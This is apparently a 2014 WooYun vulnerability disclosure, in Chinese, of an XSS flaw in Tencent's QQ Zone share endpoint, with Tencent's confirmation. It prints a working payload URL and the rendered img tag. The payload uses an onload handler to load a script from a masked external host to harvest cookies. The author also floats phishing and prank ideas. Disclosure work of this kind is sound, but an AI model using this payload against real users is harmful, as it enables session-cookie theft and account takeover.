当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-049820

漏洞标题:分享到QQ空间XSS可获取大量COOKIE

相关厂商:腾讯

漏洞作者: thx

提交时间:2014-01-25 19:07

修复时间:2014-03-11 19:08

公开时间:2014-03-11 19:08

漏洞类型:xss跨站脚本攻击

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-01-25: 细节已通知厂商并且等待厂商处理中
2014-01-26: 厂商已经确认,细节仅向厂商公开
2014-02-05: 细节向核心白帽子及相关领域专家公开
2014-02-15: 细节向普通白帽子公开
2014-02-25: 细节向实习白帽子公开
2014-03-11: 细节向公众公开

简要描述:

分享到QQ空间XSS,可获取COOKIE

详细说明:

http://sns.qzone.qq.com/cgi-bin/qzshare/cgi_qzshare_onekey?url=http://www.baidu.com&showcount=0&desc=baidu&summary=baidu&site=baidu&pics=http%3A%2F%2Fwww.baidu.com%2Fimg%2Fbdlogo.gif%23%22%20onload%3D%22var%20s%3Ddocument.createElement%28%27script%27%29%3Bs.src%3D%27http%3A%2F%2Fxxx.xxx.xxx%2FwowS3i%3F1390008412%27%3Bdocument.body.appendChild%28s%29%3B&style=202&width=105&height=31&otype=share&showcount=
参数pics=图片地址 存在XSS ,#号绕过图片验证 ,可用onload属性,基本没什么过滤。带入后实际代码如下

<img width="72px" src="http://www.baidu.com/img/bdlogo.gif#" onload="var s=document.createElement('script');s.src='http://xxx.xxx.xxx/wowS3i?1390008412';document.body.appendChild(s);">


本来觉得能获取cookie,去钓QQ就完结了。后来想到挖洞要深入,就有了下面不成功的尝试(分享到QQ空间后这段就忽略吧,各种尝试都失败):
还是回到分享页面,第一次分享一个网址,腾讯会采集url信息然后保存,后面再分享同一个网址就只是调用第一次保存的信息。如果第一次保存的信息里能插入XSS,那后面再有人分享就直接触发了,cookie花花的来啊。
腾讯抓取网页信息:http://sns.qzone.qq.com/cgi-bin/qzshare/cgi_qzshareget_urlinfo?fupdate=1&random=0&url=http%3A%2F%2Fwww.baidu.com&g_tk=1642964085
chrome显示:

_Callback({
"code":0,
"subcode":0,
"message":"",
"default":0,
"data":
{"nick":"銆鎴戝柣銆鍑°鏄","pics":"","site":"","summary":"百度一下,你就知道\r\n搜索设置|登录 注册\r\n新 闻 网 页 贴 吧 知 道 音 乐 图 片 视 频 地 图\r\n输入法\r\n手写\r\n拼音\r\n关闭...","title":"百度一下,你就知道 ","type":4,"uin":10000,"urlcount":15480848}}
);


抓取信息的规则,summary是<body>后第一个<p>标签之间的内容,title是<title>或者<div id="title">类似标签之间的内容,pics试了几次,搞不懂规律,抓到的图片地址也会URL编码。
自己在服务器新建个网页,放上基本会抓取的代码,有输出的几个地方summary,title,pics ,各种改名改编码各种尝试。summary可以放各种标签,title放标签都被杀了,在JSON有部分符号变jsunicode,在分享页都变成htmlcode 。
总觉得有可以利用的地方,但是能力确实有限,再下去就头痛了。。。不过还是可以恶搞一下,把朋友没分享过的网站主页改下,比如title改成"此页是我开,QQ10000",分享一次再改回来,不留痕迹,以后他网站要是火了,别人一点分享到空间就看到你大名了。又或者在竞争对手网页放上广告,别人一分享,哈哈哈...

漏洞证明:

XSS成功截图

修复方案:

你们更懂

版权声明:转载请注明来源 thx@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2014-01-26 09:40

厂商回复:

非常感谢您的报告,问题已着手处理,感谢大家对腾讯业务安全的关注。如果您有任何疑问,欢迎反馈,我们会有专人跟进处理。

最新状态:

暂无